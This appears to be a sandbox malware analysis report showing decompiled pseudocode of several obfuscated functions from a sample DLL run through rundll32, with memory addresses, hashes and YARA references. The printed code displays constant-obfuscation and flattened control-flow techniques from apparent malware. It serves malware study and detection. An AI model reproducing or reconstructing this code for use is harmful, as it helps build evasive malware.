                                                                        0x1001c28c
                                                                        0x1001c292
                                                                        0x1001c313
                                                                        0x1001c313
                                                                        0x1001c319
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c31f
                                                                        0x1001c294
                                                                        0x1001c29d
                                                                        0x1001c2ad
                                                                        0x1001c2b2
                                                                        0x1001c2b7
                                                                        0x1001c2bd
                                                                        0x00000000
                                                                        0x1001c2bd
                                                                        0x1001c2b7
                                                                        0x1001c292
                                                                        0x1001c28a
                                                                        0x1001c27e
                                                                        0x1001c352
                                                                        0x1001c352
                                                                        0x1001c306
                                                                        0x1001c30b
                                                                        0x1001c30e
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EP$S$f;$oK$r
                                                                        • API String ID: 0-800867564
                                                                        • Opcode ID: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
                                                                        • Instruction ID: d204fd09f4313df74329eeb12e1bf2a89ad17ecc6e86b591d2f7d2102d956d92
                                                                        • Opcode Fuzzy Hash: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
                                                                        • Instruction Fuzzy Hash: BB8152715083419FE354CF65C88581FBBF5FBC9348F50891EF5998A2A0D3B6CA898B42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001CDCC, Relevance: 6.4, Strings: 5, Instructions: 160COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E1001CDCC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a24) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t139;
				signed int _t152;
				void* _t157;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t175;
				signed int* _t178;

				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t139);
				_v28 = 0x325f;
				_t178 =  &(( &_v56)[8]);
				_v28 = _v28 + 0xffff4d87;
				_v28 = _v28 + 0xffff7eee;
				_t175 = 0;
				_v28 = _v28 ^ 0xfffeea83;
				_t157 = 0x2e625de7;
				_v16 = 0x7ea1;
				_t171 = 0x4c;
				_v16 = _v16 * 0x50;
				_v16 = _v16 ^ 0x0027b5c0;
				_v48 = 0xb396;
				_v48 = _v48 << 2;
				_v48 = _v48 + 0xffffd4e6;
				_v48 = _v48 * 0x23;
				_v48 = _v48 ^ 0x005c32d3;
				_v52 = 0x4c8e;
				_v52 = _v52 >> 4;
				_v52 = _v52 + 0xffff8362;
				_v52 = _v52 | 0xaf524c7b;
				_v52 = _v52 ^ 0xffffb92c;
				_v20 = 0xd7f5;
				_v20 = _v20 | 0xc3990154;
				_v20 = _v20 ^ 0xc3999ac5;
				_v56 = 0x9c91;
				_v56 = _v56 | 0x8c86dbc7;
				_v56 = _v56 + 0xf56e;
				_v56 = _v56 ^ 0x560a30e6;
				_v56 = _v56 ^ 0xda8da389;
				_v12 = 0xdf7a;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0x0001eefc;
				_v24 = 0x3c6;
				_v24 = _v24 | 0x5cdca8ce;
				_v24 = _v24 + 0x7ec4;
				_v24 = _v24 ^ 0x5cdd52aa;
				_v4 = 0xc884;
				_v4 = _v4 | 0x864be180;
				_v4 = _v4 ^ 0x864b8e34;
				_v32 = 0xecf0;
				_v32 = _v32 / _t171;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00000683;
				_v8 = 0xa81d;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x05408dca;
				_v36 = 0x9864;
				_t172 = 0x59;
				_v36 = _v36 / _t172;
				_v36 = _v36 ^ 0xaaa5894b;
				_v36 = _v36 + 0xffff7394;
				_v36 = _v36 ^ 0xaaa4dea0;
				_v40 = 0xd8eb;
				_v40 = _v40 + 0x511b;
				_v40 = _v40 >> 3;
				_v40 = _v40 + 0xffff6e25;
				_v40 = _v40 ^ 0xffffcd83;
				_v44 = 0x92f;
				_v44 = _v44 ^ 0xfb5f1719;
				_v44 = _v44 << 3;
				_t173 = 0x32;
				_t174 = _v4;
				_v44 = _v44 / _t173;
				_v44 = _v44 ^ 0x0461405b;
				do {
					while(_t157 != 0xc7aef4e) {
						if(_t157 == 0x1f37240b) {
							_t152 = E1000CF11(0, _a16, _v28, 0xffffffff, _v16, _t157, _v48, 0, _v52, _a8, _v20, _v56);
							_t174 = _t152;
							_t178 =  &(_t178[0xa]);
							if(_t152 != 0) {
								_t157 = 0xc7aef4e;
								continue;
							}
						} else {
							if(_t157 == 0x2e625de7) {
								_t157 = 0x1f37240b;
								continue;
							} else {
								if(_t157 != 0x32a206ac) {
									goto L13;
								} else {
									E1000CF11(_t174, _a16, _v4, 0xffffffff, _v32, _t157, _v8, _t175, _v36, _a8, _v40, _v44);
								}
							}
						}
						L6:
						return _t175;
					}
					_push(_t157);
					_t175 = E100157E8(_t174 + _t174);
					if(_t175 == 0) {
						_t157 = 0x3ab8f213;
						goto L13;
					} else {
						_t157 = 0x32a206ac;
						continue;
					}
					goto L6;
					L13:
				} while (_t157 != 0x3ab8f213);
				goto L6;
			}

























                                                                        0x1001cdd3
                                                                        0x1001cdd7
                                                                        0x1001cdd9
                                                                        0x1001cddd
                                                                        0x1001cddf
                                                                        0x1001cde3
                                                                        0x1001cde7
                                                                        0x1001cde8
                                                                        0x1001cde9
                                                                        0x1001cdee
                                                                        0x1001cdf6
                                                                        0x1001cdf9
                                                                        0x1001ce03
                                                                        0x1001ce0b
                                                                        0x1001ce0d
                                                                        0x1001ce15
                                                                        0x1001ce1a
                                                                        0x1001ce29
                                                                        0x1001ce2c
                                                                        0x1001ce30
                                                                        0x1001ce38
                                                                        0x1001ce40
                                                                        0x1001ce45
                                                                        0x1001ce52
                                                                        0x1001ce56
                                                                        0x1001ce5e
                                                                        0x1001ce66
                                                                        0x1001ce6b
                                                                        0x1001ce73
                                                                        0x1001ce7b
                                                                        0x1001ce83
                                                                        0x1001ce8b
                                                                        0x1001ce93
                                                                        0x1001ce9b
                                                                        0x1001cea3
                                                                        0x1001ceab
                                                                        0x1001ceb3
                                                                        0x1001cebb
                                                                        0x1001cec3
                                                                        0x1001cecb
                                                                        0x1001cecf
                                                                        0x1001ced7
                                                                        0x1001cedf
                                                                        0x1001cee7
                                                                        0x1001ceef
                                                                        0x1001cef7
                                                                        0x1001ceff
                                                                        0x1001cf07
                                                                        0x1001cf0f
                                                                        0x1001cf1f
                                                                        0x1001cf23
                                                                        0x1001cf28
                                                                        0x1001cf2d
                                                                        0x1001cf35
                                                                        0x1001cf3d
                                                                        0x1001cf42
                                                                        0x1001cf4a
                                                                        0x1001cf56
                                                                        0x1001cf59
                                                                        0x1001cf5d
                                                                        0x1001cf65
                                                                        0x1001cf6d
                                                                        0x1001cf75
                                                                        0x1001cf7d
                                                                        0x1001cf85
                                                                        0x1001cf8a
                                                                        0x1001cf92
                                                                        0x1001cf9a
                                                                        0x1001cfa4
                                                                        0x1001cfb1
                                                                        0x1001cfc1
                                                                        0x1001cfc4
                                                                        0x1001cfc8
                                                                        0x1001cfcc
                                                                        0x1001cfd4
                                                                        0x1001cfd4
                                                                        0x1001cfde
                                                                        0x1001d057
                                                                        0x1001d05c
                                                                        0x1001d05e
                                                                        0x1001d063
                                                                        0x1001d065
                                                                        0x00000000
                                                                        0x1001d065
                                                                        0x1001cfe0
                                                                        0x1001cfe6
                                                                        0x1001d02c
                                                                        0x00000000
                                                                        0x1001cfe8
                                                                        0x1001cfee
                                                                        0x00000000
                                                                        0x1001cff4
                                                                        0x1001d01a
                                                                        0x1001d01f
                                                                        0x1001cfee
                                                                        0x1001cfe6
                                                                        0x1001d023
                                                                        0x1001d02b
                                                                        0x1001d02b
                                                                        0x1001d074
                                                                        0x1001d07d
                                                                        0x1001d082
                                                                        0x1001d08e
                                                                        0x00000000
                                                                        0x1001d084
                                                                        0x1001d084
                                                                        0x00000000
                                                                        0x1001d084
                                                                        0x00000000
                                                                        0x1001d093
                                                                        0x1001d093
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /$_2$0V$]b.$]b.
                                                                        • API String ID: 0-2210830570
                                                                        • Opcode ID: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
                                                                        • Instruction ID: 48653eb64770e08f90b0effd2631becc7befea07c136a9e8f7f8472ce2e08f8d
                                                                        • Opcode Fuzzy Hash: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
                                                                        • Instruction Fuzzy Hash: CD71447150D3429FD358CF61C84991FBBE2FBC8758F104A1DF5965A2A0C3B5CA4A8F86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10017570, Relevance: 6.4, Strings: 5, Instructions: 145COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10017570(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v584;
				void* _t176;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;

				_v20 = 0x17f2;
				_t183 = 0x21;
				_v20 = _v20 / _t183;
				_v20 = _v20 + 0x6d93;
				_v20 = _v20 ^ 0xb3130aa6;
				_v20 = _v20 ^ 0xb31362a2;
				_v44 = 0x7846;
				_t184 = 0x2b;
				_v44 = _v44 / _t184;
				_v44 = _v44 | 0x2d637405;
				_v44 = _v44 ^ 0x2d633d3a;
				_v12 = 0x826a;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xfdce;
				_v12 = _v12 ^ 0x01053037;
				_v40 = 0xb008;
				_t185 = 9;
				_v40 = _v40 / _t185;
				_v40 = _v40 | 0xdff8508a;
				_v40 = _v40 ^ 0xdff82a49;
				_v16 = 0x97c9;
				_v16 = _v16 >> 6;
				_v16 = _v16 << 0xd;
				_t186 = 0x13;
				_v16 = _v16 / _t186;
				_v16 = _v16 ^ 0x0003c223;
				_v52 = 0xe117;
				_v52 = _v52 + 0xb465;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x00cab1cc;
				_v8 = 0x7d37;
				_v8 = _v8 ^ 0x8829a720;
				_v8 = _v8 << 0xa;
				_t187 = 0x5d;
				_v8 = _v8 * 0x3b;
				_v8 = _v8 ^ 0x950d599f;
				_v28 = 0xafcc;
				_v28 = _v28 / _t187;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00004226;
				_v56 = 0x4900;
				_v56 = _v56 | 0xacb64693;
				_v56 = _v56 ^ 0xacb6052b;
				_v24 = 0xef8a;
				_v24 = _v24 + 0xf857;
				_v24 = _v24 ^ 0xfd20d672;
				_v24 = _v24 * 0x1d;
				_v24 = _v24 ^ 0xacc29ce3;
				_v48 = 0xd87;
				_v48 = _v48 | 0xb3f54364;
				_v48 = _v48 + 0xffff5c7b;
				_v48 = _v48 ^ 0xb3f4bccb;
				_v60 = 0x28ae;
				_v60 = _v60 + 0xfffff49f;
				_v60 = _v60 ^ 0x000001f3;
				_v36 = 0xf8cf;
				_v36 = _v36 ^ 0x7fa8aefd;
				_v36 = _v36 + 0xffff1020;
				_v36 = _v36 ^ 0x7fa70865;
				_v32 = 0x4e50;
				_t188 = 0xf;
				_v32 = _v32 * 0x79;
				_t189 = 6;
				_v32 = _v32 / _t188;
				_v32 = _v32 ^ 0x0002677d;
				_v64 = 0x2ab7;
				_v64 = _v64 / _t189;
				_v64 = _v64 ^ 0x00007a29;
				_t176 = E10001E13(_v20, _v44, _v12, _v40,  *0x100221b0 + 0x10);
				_t213 = _a4 + 0x2c;
				if(E1000D867(_a4 + 0x2c, _v16, _t176, _v52, _v8, _v28) != 0) {
					E1001DEE8(_v56,  &_v584, _v24, _t213, _a8, _v48);
					E10003CA0(_v60, _v36, _v32,  &_v584, _v64);
				}
				return 1;
			}



























                                                                        0x10017579
                                                                        0x10017588
                                                                        0x1001758d
                                                                        0x10017592
                                                                        0x10017599
                                                                        0x100175a0
                                                                        0x100175a7
                                                                        0x100175b1
                                                                        0x100175b6
                                                                        0x100175bb
                                                                        0x100175c2
                                                                        0x100175c9
                                                                        0x100175d0
                                                                        0x100175d4
                                                                        0x100175d8
                                                                        0x100175df
                                                                        0x100175e6
                                                                        0x100175f0
                                                                        0x100175f5
                                                                        0x100175fa
                                                                        0x10017601
                                                                        0x10017608
                                                                        0x1001760f
                                                                        0x10017613
                                                                        0x1001761a
                                                                        0x1001761f
                                                                        0x10017624
                                                                        0x1001762b
                                                                        0x10017632
                                                                        0x10017639
                                                                        0x1001763d
                                                                        0x10017644
                                                                        0x1001764b
                                                                        0x10017652
                                                                        0x1001765a
                                                                        0x1001765b
                                                                        0x1001765e
                                                                        0x10017665
                                                                        0x10017671
                                                                        0x10017674
                                                                        0x10017677
                                                                        0x1001767e
                                                                        0x10017685
                                                                        0x1001768c
                                                                        0x10017693
                                                                        0x1001769a
                                                                        0x100176a1
                                                                        0x100176ac
                                                                        0x100176af
                                                                        0x100176b6
                                                                        0x100176bd
                                                                        0x100176c4
                                                                        0x100176cb
                                                                        0x100176d2
                                                                        0x100176d9
                                                                        0x100176e0
                                                                        0x100176e7
                                                                        0x100176ee
                                                                        0x100176f5
                                                                        0x100176fe
                                                                        0x10017705
                                                                        0x10017712
                                                                        0x10017715
                                                                        0x1001771d
                                                                        0x1001771e
                                                                        0x10017723
                                                                        0x1001772a
                                                                        0x10017736
                                                                        0x10017739
                                                                        0x10017755
                                                                        0x10017763
                                                                        0x10017779
                                                                        0x1001778e
                                                                        0x100177a6
                                                                        0x100177ab
                                                                        0x100177b5

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi
                                                                        • String ID: &B$)z$7}$:=c-$PN
                                                                        • API String ID: 1586166983-136981183
                                                                        • Opcode ID: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
                                                                        • Instruction ID: 4c0853177137f9260245fdea803910a11f1a139b5b3783921c9f25fd3a1c4bd4
                                                                        • Opcode Fuzzy Hash: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
                                                                        • Instruction Fuzzy Hash: 59611471D0020EEBEF48CFE5D98A9EEBBB2FB44314F208059E411B6290D7B95A45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000C6EF, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E1000C6EF(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t105;
				intOrPtr* _t118;
				void* _t120;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int* _t133;

				_push(_a20);
				_t131 = __edx;
				_t118 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t105);
				_v32 = 0x6ec3;
				_t133 =  &(( &_v48)[7]);
				_v32 = _v32 << 2;
				_v32 = _v32 >> 0xd;
				_t128 = 0;
				_v32 = _v32 ^ 0x00000124;
				_t120 = 0x2e625de7;
				_v20 = 0xd76a;
				_t129 = 5;
				_v20 = _v20 / _t129;
				_v20 = _v20 ^ 0x000055da;
				_v48 = 0x58a7;
				_v48 = _v48 + 0x6c8;
				_v48 = _v48 << 0xb;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0xf6f0317b;
				_v36 = 0x5d19;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 + 0xb738;
				_v36 = _v36 ^ 0x0027d757;
				_v24 = 0x73a3;
				_v24 = _v24 + 0x4f0f;
				_v24 = _v24 ^ 0x0000ed3d;
				_v44 = 0x403e;
				_v44 = _v44 ^ 0xd0448639;
				_v44 = _v44 + 0xffffdeb2;
				_v44 = _v44 << 4;
				_v44 = _v44 ^ 0x044a6664;
				_v16 = 0x1c10;
				_v16 = _v16 * 0x51;
				_v16 = _v16 ^ 0x0008f1ff;
				_v4 = 0x63b7;
				_v4 = _v4 << 0x10;
				_v4 = _v4 ^ 0x63b7360b;
				_v28 = 0x3e7f;
				_v28 = _v28 ^ 0x7d4cf8f0;
				_t130 = _v4;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x89322d32;
				_v40 = 0xdd6b;
				_v40 = _v40 + 0xfc8c;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x0000558e;
				_v8 = 0x49f9;
				_v8 = _v8 + 0xfffff29f;
				_v8 = _v8 ^ 0x00000d42;
				_v12 = 0x318;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x0000321b;
				do {
					while(_t120 != 0xc7aef4e) {
						if(_t120 == 0x1f37240b) {
							_t130 = E10009A00(_v32, _t120, 0, _v20, _a16, 0, _a12, _v48, _t120, _v36, _v24, _t131);
							_t133 =  &(_t133[0xb]);
							if(_t130 == 0) {
								L7:
								return _t128;
							}
							_t120 = 0xc7aef4e;
							continue;
						}
						if(_t120 == 0x2e625de7) {
							_t120 = 0x1f37240b;
							continue;
						}
						if(_t120 != 0x32a206ac) {
							goto L14;
						}
						E10009A00(_v4, _t120, _t128, _v28, _a16, _t130, _a12, _v40, _t120, _v8, _v12, _t131);
						if(_t118 != 0) {
							 *_t118 = _t130;
						}
						goto L7;
					}
					_push(_t120);
					_t128 = E100157E8(_t130);
					if(_t128 == 0) {
						_t120 = 0x3ab8f213;
						goto L14;
					}
					_t120 = 0x32a206ac;
					continue;
					L14:
				} while (_t120 != 0x3ab8f213);
				goto L7;
			}























                                                                        0x1000c6f6
                                                                        0x1000c6fa
                                                                        0x1000c6fc
                                                                        0x1000c6fe
                                                                        0x1000c702
                                                                        0x1000c706
                                                                        0x1000c70a
                                                                        0x1000c70e
                                                                        0x1000c70f
                                                                        0x1000c710
                                                                        0x1000c715
                                                                        0x1000c71d
                                                                        0x1000c720
                                                                        0x1000c727
                                                                        0x1000c72c
                                                                        0x1000c72e
                                                                        0x1000c736
                                                                        0x1000c73b
                                                                        0x1000c749
                                                                        0x1000c74c
                                                                        0x1000c750
                                                                        0x1000c758
                                                                        0x1000c760
                                                                        0x1000c768
                                                                        0x1000c76d
                                                                        0x1000c772
                                                                        0x1000c77a
                                                                        0x1000c787
                                                                        0x1000c78b
                                                                        0x1000c793
                                                                        0x1000c79b
                                                                        0x1000c7a3
                                                                        0x1000c7ab
                                                                        0x1000c7b3
                                                                        0x1000c7bb
                                                                        0x1000c7c3
                                                                        0x1000c7cb
                                                                        0x1000c7d0
                                                                        0x1000c7d8
                                                                        0x1000c7e5
                                                                        0x1000c7e9
                                                                        0x1000c7f1
                                                                        0x1000c7f9
                                                                        0x1000c7fe
                                                                        0x1000c806
                                                                        0x1000c80e
                                                                        0x1000c81b
                                                                        0x1000c81f
                                                                        0x1000c823
                                                                        0x1000c82b
                                                                        0x1000c833
                                                                        0x1000c83b
                                                                        0x1000c840
                                                                        0x1000c845
                                                                        0x1000c84d
                                                                        0x1000c855
                                                                        0x1000c85d
                                                                        0x1000c865
                                                                        0x1000c86d
                                                                        0x1000c872
                                                                        0x1000c87a
                                                                        0x1000c87a
                                                                        0x1000c88c
                                                                        0x1000c90a
                                                                        0x1000c90c
                                                                        0x1000c911
                                                                        0x1000c8d1
                                                                        0x1000c8da
                                                                        0x1000c8da
                                                                        0x1000c913
                                                                        0x00000000
                                                                        0x1000c913
                                                                        0x1000c894
                                                                        0x1000c8db
                                                                        0x00000000
                                                                        0x1000c8db
                                                                        0x1000c89c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000c8c3
                                                                        0x1000c8cd
                                                                        0x1000c8cf
                                                                        0x1000c8cf
                                                                        0x00000000
                                                                        0x1000c8cd
                                                                        0x1000c925
                                                                        0x1000c92d
                                                                        0x1000c932
                                                                        0x1000c93e
                                                                        0x00000000
                                                                        0x1000c93e
                                                                        0x1000c934
                                                                        0x00000000
                                                                        0x1000c943
                                                                        0x1000c943
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =$>@$B$]b.$]b.
                                                                        • API String ID: 0-2184513905
                                                                        • Opcode ID: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
                                                                        • Instruction ID: e65ca6d1074f01d69a0b358cd156f112c6aca70ad4656599cc2acd5269c1bdd2
                                                                        • Opcode Fuzzy Hash: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
                                                                        • Instruction Fuzzy Hash: 7A516372008341ABE358CF61C88991FBBE1FBC8798F108A1DF59652260C7B5DA09DF97
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10009AE1, Relevance: 6.4, Strings: 5, Instructions: 133COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E10009AE1(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr* _t145;
				intOrPtr* _t148;
				intOrPtr* _t150;
				void* _t155;
				void* _t156;

				_t132 = __ecx;
				_t148 =  *0x10021400; // 0x0
				while(_t148 != 0) {
					if( *_t148 != 0) {
						 *((intOrPtr*)(_t148 + 0x1c))( *_t148, 0xb, 0);
					}
					_t148 =  *((intOrPtr*)(_t148 + 0x10));
				}
				_t133 = _t132 | 0xffffffff;
				_pop(_t149);
				_t156 = _t155 - 0x40;
				_v8 = 0x42f0c0;
				_t130 = _t133;
				_v4 = 0;
				_v32 = 0x6e16;
				_t145 = 0x10021400;
				_v32 = _v32 * 0x5a;
				_v32 = _v32 ^ 0x0026feb4;
				_v36 = 0x8b1c;
				_v36 = _v36 | 0xe0bb5784;
				_v36 = _v36 ^ 0xe0bbe7d8;
				_v44 = 0xb12;
				_v44 = _v44 ^ 0x7b8ee909;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x07b8dae4;
				_v60 = 0xab64;
				_v60 = _v60 + 0xffff1f21;
				_v60 = _v60 ^ 0x0d405f68;
				_v60 = _v60 ^ 0x2b3fedb8;
				_v60 = _v60 ^ 0xd98056b3;
				_v64 = 0x7bd7;
				_v64 = _v64 * 0x50;
				_v64 = _v64 >> 8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 ^ 0x0135cdcf;
				_v16 = 0xecab;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x0029a0af;
				_v40 = 0xc18d;
				_v40 = _v40 + 0x35cc;
				_v40 = _v40 + 0x172a;
				_v40 = _v40 ^ 0x00011856;
				_v20 = 0xa565;
				_v20 = _v20 | 0x765f3394;
				_v20 = _v20 ^ 0x765fa4be;
				_v24 = 0xe1b9;
				_v24 = _v24 * 0x49;
				_v24 = _v24 ^ 0x00405f3b;
				_v48 = 0x2e03;
				_v48 = _v48 + 0xf77b;
				_v48 = _v48 ^ 0x50a91f1d;
				_v48 = _v48 ^ 0x34247e68;
				_v48 = _v48 ^ 0x648c5df0;
				_v12 = 0x6cf0;
				_v12 = _v12 + 0x5895;
				_v12 = _v12 ^ 0x0000ed40;
				_v52 = 0x996c;
				_v52 = _v52 + 0xd3f;
				_v52 = _v52 << 0xa;
				_v52 = _v52 ^ 0x4e95cfbf;
				_v52 = _v52 ^ 0x4c0f105b;
				_v56 = 0xb088;
				_v56 = _v56 + 0xffff7048;
				_v56 = _v56 >> 5;
				_v56 = _v56 * 0x1f;
				_v56 = _v56 ^ 0x00001ffc;
				_v28 = 0xa4f1;
				_v28 = _v28 + 0xacd;
				_v28 = _v28 ^ 0x0000afbe;
				_t150 =  *0x10021400; // 0x0
				while(_t150 != 0) {
					if( *_t150 == 0) {
						L10:
						 *_t145 =  *((intOrPtr*)(_t150 + 0x10));
						_t124 = E100091CD(_v48, _v12, _v52, _t150, _v56);
						_t156 = _t156 + 0xc;
					} else {
						_t124 = E10017CBC(_v32,  *((intOrPtr*)(_t150 + 4)), _t130, _v36);
						if(_t124 != _v28) {
							_t117 = _t150 + 0x10; // 0x10
							_t145 = _t117;
						} else {
							 *((intOrPtr*)(_t150 + 0x1c))( *_t150, 0, 0);
							E10018C8B(_v56, _v72, _v76,  *_t150);
							E100078F0( *((intOrPtr*)(_t150 + 4)), _v28, _v52, _v32, _v36);
							_t156 = _t156 + 0x14;
							goto L10;
						}
					}
					_t150 =  *_t145;
				}
				return _t124;
			}






























                                                                        0x10009ae1
                                                                        0x10009ae2
                                                                        0x10009afb
                                                                        0x10009aed
                                                                        0x10009af5
                                                                        0x10009af5
                                                                        0x10009af8
                                                                        0x10009af8
                                                                        0x10009aff
                                                                        0x10009b02
                                                                        0x10011e45
                                                                        0x10011e48
                                                                        0x10011e54
                                                                        0x10011e56
                                                                        0x10011e5a
                                                                        0x10011e69
                                                                        0x10011e6e
                                                                        0x10011e72
                                                                        0x10011e7a
                                                                        0x10011e82
                                                                        0x10011e8a
                                                                        0x10011e92
                                                                        0x10011e9a
                                                                        0x10011ea2
                                                                        0x10011ea7
                                                                        0x10011eaf
                                                                        0x10011eb7
                                                                        0x10011ebf
                                                                        0x10011ec7
                                                                        0x10011ecf
                                                                        0x10011ed7
                                                                        0x10011ee4
                                                                        0x10011ee8
                                                                        0x10011eed
                                                                        0x10011ef2
                                                                        0x10011efa
                                                                        0x10011f07
                                                                        0x10011f0b
                                                                        0x10011f13
                                                                        0x10011f1b
                                                                        0x10011f23
                                                                        0x10011f2b
                                                                        0x10011f33
                                                                        0x10011f3b
                                                                        0x10011f43
                                                                        0x10011f4b
                                                                        0x10011f58
                                                                        0x10011f5c
                                                                        0x10011f64
                                                                        0x10011f6c
                                                                        0x10011f74
                                                                        0x10011f7c
                                                                        0x10011f84
                                                                        0x10011f8c
                                                                        0x10011f94
                                                                        0x10011f9c
                                                                        0x10011fa4
                                                                        0x10011fac
                                                                        0x10011fb4
                                                                        0x10011fb9
                                                                        0x10011fc1
                                                                        0x10011fc9
                                                                        0x10011fd1
                                                                        0x10011fd9
                                                                        0x10011fe3
                                                                        0x10011fe7
                                                                        0x10011fef
                                                                        0x10011ff7
                                                                        0x10011fff
                                                                        0x10012007
                                                                        0x10012081
                                                                        0x10012011
                                                                        0x10012061
                                                                        0x10012075
                                                                        0x10012077
                                                                        0x1001207c
                                                                        0x10012013
                                                                        0x1001201f
                                                                        0x1001202a
                                                                        0x1001208d
                                                                        0x1001208d
                                                                        0x1001202c
                                                                        0x10012030
                                                                        0x10012041
                                                                        0x10012059
                                                                        0x1001205e
                                                                        0x00000000
                                                                        0x1001205e
